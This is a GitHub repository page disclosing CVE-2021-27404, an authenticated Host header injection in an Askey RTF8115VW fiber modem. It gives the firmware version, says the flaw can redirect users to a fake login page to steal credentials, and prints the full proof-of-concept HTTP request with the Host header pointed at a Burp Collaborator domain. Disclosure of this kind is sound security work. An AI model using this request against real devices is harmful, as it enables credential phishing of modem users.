Skip to content

bokanrb/CVE-2021-27404

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

Authenticated Host Header Injection - Askey Internet Fiber Modem

Vendor: Askey
Software Version: BR_SV_g11.11_RTF_TEF001_V6.54_V014
Model: RTF8115VW
Vulnerable Header: Host
Not tested in other model/version.

Impact: An attacker could take advantege on that vulnerability to redirect user to a fake Login page in order to extract his credentials, or cookies.

The Final Request

GET / HTTP/1.1
Host: kay4tb35bh55y38n8h4teim21t7jv8.burpcollaborator.net
Cookie: _httpdSessionId_=7924107467ea5838a196b65306ca7236
Upgrade-Insecure-Requests: 1
Referer: http://x.x.x.x/cgi-bin/te_logout.cgi
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate

Alt text

About

HostHeaderInjection-Askey

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published